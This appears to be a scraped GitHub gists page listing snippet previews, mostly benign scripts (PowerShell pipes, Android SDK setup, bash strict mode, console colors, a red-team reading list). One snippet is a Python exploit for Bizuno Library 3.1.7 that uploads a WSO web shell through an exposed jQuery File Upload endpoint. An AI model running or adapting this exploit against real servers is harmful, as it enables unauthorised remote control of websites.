Skip to content

Instantly share code, notes, and snippets.

View joaociocca's full-sized avatar
❤️‍🔥
Working from home

João Ciocca joaociocca

❤️‍🔥
Working from home
12 followers · 11 following
View GitHub Profile
@awakecoding
awakecoding / PSSecureCommand.ps1
Created November 30, 2020 21:30
Launch a new PowerShell instance and send secure commands to it that won't be leaked in command-line parameters, environment variables or the console history.
function Invoke-PSCmdClient
{
param(
[Parameter(Position=0)]
[string] $PipeName
)
$Pipe = [System.IO.Pipes.NamedPipeClientStream]::new('.', $PipeName,
[System.IO.Pipes.PipeDirection]::In)
@0xdade
0xdade / wildcard_nginx_config.md
Last active June 28, 2020 03:07
Distribute the denial of secrets

Distributing the denial of secrets

Twitter made ddosecrets.com a forbidden place. I don't like being forbidden from going places or sharing links to said places.

It's dangerous to go alone, take these:

@islanddog
islanddog / jquery-file-upload.py
Created May 18, 2020 19:03
Bizuno Library 3.1.7 - JQuery File Upload Script
#!/usr/bin/python
import requests
# Host IP http://IP
host='Put IP HERE'
# JQuery path for Bizuno Library 3.1.7
url=host+'/Books/apps/jquery-file-upload/server/php/index.php'
# Uploading the shell to the server. I use wso-4.2.5.php in this example:
files = {'files': open('wso-4.2.5.php', 'rb')}
r = requests.post(url, files=files)
# Location of Shell/Name - wso.php
@nhtua
nhtua / 00.install-android-sdk.sh
Last active July 1, 2024 20:33
Run a Headless Android Device on Ubuntu server (no GUI)
#!/bin/bash -i
#using shebang with -i to enable interactive mode (auto load .bashrc)
set -e #stop immediately if any error happens
# Install Open SDK
apt update
apt install openjdk-8-jdk -y
update-java-alternatives --set java-1.8.0-openjdk-amd64
java -version
@mohanpedala
mohanpedala / bash_strict_mode.md
Last active July 8, 2024 18:25
set -e, -u, -o, -x pipefail explanation
@jaytaylor
jaytaylor / ._README.md
Last active March 4, 2024 23:39
URL Encoding in pure bash / sed.
@jbsulli
jbsulli / GitHub spoiler markdown.md
Last active June 10, 2024 09:53

Demo:

Spoiler warning

Spoiler text. Note that it's important to have a space after the summary tag. You should be able to write any markdown you want inside the <details> tag... just make sure you close <details> afterward.

console.log("I'm a code block!");
@abritinthebay
abritinthebay / consoleColors.js
Last active June 27, 2024 08:00
The various escape codes you can use to color output to StdOut from Node JS
// Colors reference
// You can use the following as so:
// console.log(colorCode, data);
// console.log(`${colorCode}some colorful text string${resetCode} rest of string in normal color`);
//
// ... and so on.
export const reset = "\x1b[0m"
export const bright = "\x1b[1m"
export const dim = "\x1b[2m"
@carnal0wnage
carnal0wnage / gist:606c41ac6ec40bf5c69d4db96d9312e3
Created April 28, 2017 16:07
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@steinwaywhw
steinwaywhw / One Liner to Download the Latest Release from Github Repo.md
Last active July 7, 2024 20:48
One Liner to Download the Latest Release from Github Repo
  • Use curl to get the JSON response for the latest release
  • Use grep to find the line containing file URL
  • Use cut and tr to extract the URL
  • Use wget to download it
curl -s https://api.github.com/repos/jgm/pandoc/releases/latest \
| grep "browser_download_url.*deb" \
| cut -d : -f 2,3 \
| tr -d \" \